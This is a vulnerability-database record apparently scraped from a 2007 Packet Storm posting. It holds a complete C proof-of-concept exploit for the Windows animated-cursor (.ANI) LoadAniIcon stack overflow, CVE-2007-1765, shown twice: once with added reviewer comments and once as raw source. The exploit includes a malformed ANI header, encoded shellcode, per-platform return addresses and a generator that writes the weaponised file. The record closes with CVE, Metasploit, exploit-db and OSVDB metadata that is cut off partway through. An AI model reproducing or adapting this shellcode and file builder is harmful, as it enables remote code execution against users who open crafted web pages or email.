ID PACKETSTORM:55512 Type packetstorm Reporter devcode Modified 2007-04-02T00:00:00
Description
`/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
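* Hotfix/Patch:
* None as of this time.
* [Reviewer note: true only for the 2007-04-02 posting. The advisory data
* further down this page lists Microsoft Security Bulletin MS07-017
* (KB 925902) as the vendor fix.]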
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
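* Notes:
* For this PoC to work against explorer.exe on XP SP2, DEP has to be
* turned off.
* [Reviewer note: this applies to this PoC only. The related entries on
* this page include an exploit titled "... Overflow Exploit Hardware DEP"
* (EDB-ID:3652), so DEP should not be treated as a substitute for the
* patch.]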
*
*/
#include <iostream>
/*
 * ANI Header: the first 88 bytes of the generated file. main() copies
 * sizeof(uszAniHeader) - 1 bytes, i.e. everything except the string
 * literal's trailing NUL.
 *
 * Reading the bytes as ASCII tags and little-endian 32-bit values:
 *   "RIFF", 0x00000400, "ACON"   container tag, size field 1024, form type
 *   "anih", 0x00000024           first anih chunk, declared length 36
 *   0x24, 0xFFFF, 0x0A, 0, 0, 0, 0, 0x10, 0x01
 *                                the 36 bytes of that chunk (nine DWORDs;
 *                                presumably the ANIHEADER fields - confirm
 *                                against the format documentation)
 *   "TSIL", 3, 4 data bytes      appears twice
 *   "anih", 0x000003A8           second anih chunk, declared length 936
 *
 * NOTE(review): the second anih chunk is the malformed element. Its
 * declared length (936) is far larger than the 36-byte header carried by
 * the first one, which matches the "malformed header" wording in the file
 * comment. For detection and parser hardening, the property to check is
 * an anih chunk whose length field is not 36.
 */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";
/*
 * Payload bytes. main() copies sizeof(uszShellcode) - 1 of them (the
 * literal's trailing NUL is dropped) to offset 192 of the output buffer.
 *
 * The author labels this as Metasploit-generated shellcode that runs
 * calc.exe. The bytes are not decoded or verified anywhere in this file,
 * so that label is unconfirmed; analyse any file built from this array as
 * untrusted executable content in an isolated environment.
 *
 * NOTE(review): after the first ten bytes the array is almost entirely
 * printable ASCII, so it is presumably the output of an alphanumeric
 * encoder - TODO confirm. The long 0x49 run near the start is a stable
 * byte pattern for a content-matching rule on this specific sample.
 */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
/*
 * Banner and usage text. main() prints it when fewer than two arguments
 * are supplied. The bracketed numbers are the indices into targets[]
 * that <target> is expected to hold.
 */
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe <target> <file>";
/*
 * One entry of the target table: a display name plus the address bytes
 * that main() writes into the generated file for that platform.
 */
typedef struct {
/* Human-readable platform name; not read anywhere in this file. */
const char *szTarget;
/* Four address bytes plus the NUL of the initialising string literal;
 * main() copies only the first four. */
unsigned char uszRet[5];
} TARGET;
/*
 * Per-platform address table, indexed by the <target> command-line value
 * (0 = Windows XP SP2, 1 = Windows 2K SP4, matching szIntro).
 *
 * NOTE(review): both entries are hard-coded absolute addresses, stored
 * least-significant byte first. The PoC therefore presumably depends on
 * a specific module build being loaded at a fixed address on the named
 * platform - confirm before drawing conclusions about other builds.
 */
TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};
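/*
 * Builds the 1024-byte malformed .ANI sample for CVE-2007-1765 and writes
 * it to the path given on the command line.
 *
 * Usage: ani.exe <target> <file>
 *   argv[1]  index into targets[] (see szIntro for the valid values)
 *   argv[2]  output path, opened in binary write mode
 *
 * Layout of the generated buffer, as assembled below:
 *   offset 0    uszAniHeader, without its trailing NUL
 *   offset 168  the 4 address bytes of the selected targets[] entry
 *   offset 192  uszShellcode, without its trailing NUL
 *   all other bytes keep the 0x90 fill from the initial memset
 *
 * Always returns 0, including on usage and I/O errors, as the original
 * did; callers cannot use the exit status to detect failure.
 */
int main( int argc, char **argv ) {
    char szBuffer[1024];
    FILE *f;
    int iTarget;
    const int cTargets = (int)( sizeof( targets ) / sizeof( targets[0] ) );

    if ( argc < 3 ) {
        printf("%s\n", szIntro );
        return 0;
    }

    /*
     * The original indexed targets[] with the raw atoi() result, so any
     * value outside the table read past the array. Validate before use.
     * atoi() yields 0 for non-numeric text, so such input still selects
     * entry 0.
     */
    iTarget = atoi( argv[1] );
    if ( iTarget < 0 || iTarget >= cTargets ) {
        printf("[-] Invalid target index\n");
        printf("%s\n", szIntro );
        return 0;
    }

    printf("[+] Creating ANI header...\n");
    memset( szBuffer, 0x90, sizeof( szBuffer ) );
    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

    printf("[+] Copying shellcode...\n");
    memcpy( szBuffer + 168, targets[iTarget].uszRet, 4 );
    memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

    printf("%s\n", argv[2] );
    f = fopen( argv[2], "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create file\n");
        return 0;
    }

    /* A short write or failed close would leave a truncated file behind
     * while the original still reported success. */
    if ( fwrite( szBuffer, 1, sizeof( szBuffer ), f ) != sizeof( szBuffer ) ) {
        printf("[-] Cannot write file\n");
        fclose( f );
        return 0;
    }
    if ( fclose( f ) != 0 ) {
        printf("[-] Cannot write file\n");
        return 0;
    }

    printf("[+] .ANI file succesfully created!\n");
    return 0;
}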
`
{"hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c7d6a870f2e9a29172ad9e5983b6a669", "key": "cvelist"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "cadf423d1660b921da6dd71b8b509a8e", "key": "href"}, {"hash": "1f3013484776ab0ebd6e12dadc50bec3", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "1f3013484776ab0ebd6e12dadc50bec3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0072e765ee070314826b7f41ce057b43", "key": "reporter"}, {"hash": "db7cb2a624f61e17d685c06086928f47", "key": "sourceData"}, {"hash": "c6760625bdd047b76d3a03119c47ae9c", "key": "sourceHref"}, {"hash": "e8164987774734bf0fc61e99606b9290", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "hash": "33df5dd7e5a708235bbb1fe69916d7761bcb3a83cf184fdd097399ebdb501245", "edition": 1, "references": [], "viewCount": 1, "type": "packetstorm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55512/devcode.txt", "reporter": "devcode", "cvelist": ["CVE-2007-1765"], "bulletinFamily": "exploit", "published": "2007-04-02T00:00:00", "title": "devcode.txt", "href": "https://packetstormsecurity.com/files/55512/devcode.txt.html", "history": [], "sourceData": "`/* \n* Copyright (c) 2007 devcode \n* \n* \n* ^^ D E V C O D E ^^ \n* \n* Windows .ANI LoadAniIcon Stack Overflow \n* [CVE-2007-1765] \n* \n* \n* Description: \n* A vulnerability has been identified in Microsoft Windows, \n* which could be exploited by remote attackers to take complete \n* control of an affected system. 
This issue is due to a stack overflow \n* error within the \"LoadAniIcon()\" [user32.dll] function when rendering \n* cursors, animated cursors or icons with a malformed header, which could \n* be exploited by remote attackers to execute arbitrary commands by \n* tricking a user into visiting a malicious web page or viewing an email \n* message containing a specially crafted ANI file. \n* \n* Hotfix/Patch: \n* None as of this time. \n* \n* Vulnerable systems: \n* Microsoft Windows 2000 Service Pack 4 \n* Microsoft Windows XP Service Pack 2 \n* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) \n* Microsoft Windows XP Professional x64 Edition \n* Microsoft Windows Server 2003 \n* Microsoft Windows Server 2003 (Itanium) \n* Microsoft Windows Server 2003 Service Pack 1 \n* Microsoft Windows Server 2003 Service Pack 1 (Itanium) \n* Microsoft Windows Server 2003 x64 Edition \n* Microsoft Windows Vista \n* \n* Microsoft Internet Explorer 6 \n* Microsoft Internet Explorer 7 \n* \n* This is a PoC and was created for educational purposes only. The \n* author is not held responsible if this PoC does not work or is \n* used for any other purposes than the one stated above. \n* \n* Notes: \n* For this to work on XP SP2 on explorer.exe, DEP has to be turned \n* off. 
\n* \n*/ \n#include <iostream> \n \n/* ANI Header */ \nunsigned char uszAniHeader[] = \n\"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68\" \n\"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02\" \n\"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00\"; \n \n/* Shellcode - metasploit exec calc.exe ^^ */ \nunsigned char uszShellcode[] = \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42\" \n\"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32\" \n\"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a\" \n\"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c\" \n\"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57\" \n\"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50\" \n\"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d\" \n\"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f\" \n\"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a\" \n\"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76\" \n\"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65\" \n\"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78\" \n\"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f\" \n\"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65\" 
\n\"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d\" \n\"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31\" \n\"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69\" \n\"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61\" \n\"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70\" \n\"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42\"; \n \nchar szIntro[] = \n\"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n\" \n\"\\t\\t\\tdevcode (c) 2007\\n\" \n\"[+] Targets:\\n\" \n\"\\tWindows XP SP2 [0]\\n\" \n\"\\tWindows 2K SP4 [1]\\n\\n\" \n\"Usage: ani.exe <target> <file>\"; \n \ntypedef struct { \nconst char *szTarget; \nunsigned char uszRet[5]; \n} TARGET; \n \nTARGET targets[] = { \n{ \"Windows XP SP2\", \"\\xC9\\x29\\xD4\\x77\" }, /* call esp */ \n{ \"Windows 2K SP4\", \"\\x29\\x4C\\xE1\\x77\" } \n}; \n \nint main( int argc, char **argv ) { \nchar szBuffer[1024]; \nFILE *f; \n \nif ( argc < 3 ) { \nprintf(\"%s\\n\", szIntro ); \nreturn 0; \n} \n \nprintf(\"[+] Creating ANI header...\\n\"); \nmemset( szBuffer, 0x90, sizeof( szBuffer ) ); \nmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); \n \nprintf(\"[+] Copying shellcode...\\n\"); \nmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); \nmemcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 ); \n \nprintf(\"%s\\n\", argv[2] ); \nf = fopen( argv[2], \"wb\" ); \nif ( f == NULL ) { \nprintf(\"[-] Cannot create file\\n\"); \nreturn 0; \n} \n \nfwrite( szBuffer, 1, 1024, f ); \nfclose( f ); \nprintf(\"[+] .ANI file succesfully created!\\n\"); \nreturn 0; \n} \n`\n", "lastseen": "2016-12-05T22:19:41", "objectVersion": "1.2", "modified": "2007-04-02T00:00:00", "description": "", "id": "PACKETSTORM:55512", "enchantments": {"vulnersScore": 5.5}}
{"result": {"cve": [{"id": "CVE-2007-1765", "type": "cve", "title": "CVE-2007-1765", "description": "Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.", "published": "2007-03-29T20:19:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1765", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-25T11:33:58"}], "packetstorm": [{"id": "PACKETSTORM:55661", "type": "packetstorm", "title": "devcode2.txt", "description": "", "published": "2007-04-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/55661/devcode2.txt.html", "cvelist": ["CVE-2007-1765"], "lastseen": "2016-12-05T22:21:36"}, {"id": "PACKETSTORM:55552", "type": "packetstorm", "title": "ani_loadimage_chunksize-email.rb.txt", "description": "", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/55552/ani_loadimage_chunksize-email.rb.txt.html", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-12-05T22:15:33"}, {"id": "PACKETSTORM:55551", "type": "packetstorm", "title": "ani_loadimage_chunksize-browser.rb.txt", "description": "", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": 
"https://packetstormsecurity.com/files/55551/ani_loadimage_chunksize-browser.rb.txt.html", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-12-05T22:23:32"}, {"id": "PACKETSTORM:83052", "type": "packetstorm", "title": "Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83052/Windows-ANI-LoadAniIcon-Chunk-Size-Stack-Overflow-SMTP.html", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-12-05T22:24:34"}], "seebug": [{"id": "SSV:6614", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)", "description": "No description provided by source.", "published": "2007-04-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-6614", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-19T22:06:34"}, {"id": "SSV:14192", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit", "description": "No description provided by source.", "published": "2007-03-31T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-14192", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-19T22:06:34"}, {"id": "SSV:6535", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit", "description": "No description provided by source.", "published": "2007-04-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-6535", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-19T22:10:03"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/EMAIL/MS07_017_ANI_LOADIMAGE_CHUNKSIZE", 
"type": "metasploit", "title": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)", "description": "This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.", "published": "2010-07-25T16:02:51", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2018-03-08T07:10:02"}], "exploitdb": [{"id": "EDB-ID:3652", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Overflow Exploit Hardware DEP", "description": "MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP). CVE-2007-0038,CVE-2007-1765. Local exploit for windows platform", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3652/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T19:00:18"}, {"id": "EDB-ID:3636", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Remote Exploit eeye patch bypass", "description": "MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass). CVE-2007-0038,CVE-2007-1765. 
Remote exploit for windows platform", "published": "2007-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3636/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:58:30"}, {"id": "EDB-ID:3634", "type": "exploitdb", "title": "Microsoft Windows XP/Vista - Animated Cursor .ANI Remote Overflow Exploit", "description": "MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit. CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "published": "2007-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3634/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:58:08"}, {"id": "EDB-ID:3617", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Stack Overflow Exploit", "description": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit. CVE-2007-0038,CVE-2007-1765. Local exploit for windows platform", "published": "2007-03-31T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3617/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:55:24"}, {"id": "EDB-ID:3635", "type": "exploitdb", "title": "Microsoft Windows XP - Animated Cursor .ANI Remote Overflow Exploit 2", "description": "MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2. CVE-2007-0038,CVE-2007-1765. 
Remote exploit for windows platform", "published": "2007-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3635/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:58:19"}, {"id": "EDB-ID:16698", "type": "exploitdb", "title": "Windows ANI LoadAniIcon Chunk Size Stack Buffer Overflow SMTP", "description": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP). CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16698/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-02-02T06:17:43"}], "osvdb": [{"id": "OSVDB:33629", "type": "osvdb", "title": "Microsoft IE Animated Cursor (.ani) Handling Arbitrary Command Execution", "description": "## Vulnerability Description\nA remote overflow exists in Microsoft Internet Explorer. The browser fails to check the buffer on animated cursors and icons resulting in a stack buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Microsoft Internet Explorer. The browser fails to check the buffer on animated cursors and icons resulting in a stack buffer overflow. 
With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor Specific Solution URL: http://www.microsoft.com/technet/security/bulletin/ms07-apr.mspx\nVendor Specific News/Changelog Entry: http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx\nVendor Specific News/Changelog Entry: http://www.microsoft.com/technet/security/advisory/935423.mspx\n[Vendor Specific Advisory URL](http://blogs.technet.com/msrc/archive/2007/03/29/microsoft-security-advisory-935423-posted.aspx)\n[Vendor Specific Advisory URL](http://www.microsoft.com/technet/security/advisory/935423.mspx)\nSecurity Tracker: 1017827\n[Secunia Advisory ID:24659](https://secuniaresearch.flexerasoftware.com/advisories/24659/)\nOther Solution URL: http://zert.isotf.org/advisories/zert-2007-01.htm\nOther Solution URL: http://research.eeye.com/html/alerts/zeroday/20070328.html\nOther Advisory URL: http://www.avertlabs.com/research/blog/?p=230\nOther Advisory URL: http://vil.nai.com/vil/content/v_141860.htm\nOther Advisory URL: http://www.avertlabs.com/research/blog/?p=233\nOther Advisory URL: http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp\nNews Article: http://news.softpedia.com/news/Windows-Vista-Suicide-Courtesy-of-McAfee-50761.shtml\nNews Article: http://www.informationweek.com/news/showArticle.jhtml?articleID=198800828\nNews Article: http://www.securityfocus.com/brief/474?ref=rss\nNews Article: http://news.bbc.co.uk/2/hi/technology/6526851.stm\nNews Article: http://www.securityfocus.com/brief/472?ref=rss\nNews Article: http://www.informationweek.com/news/showArticle.jhtml?articleID=198900231\nMicrosoft Security Bulletin: MS07-017\nMicrosoft Knowledge Base Article: 925902\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0470.html\nMail List Post: 
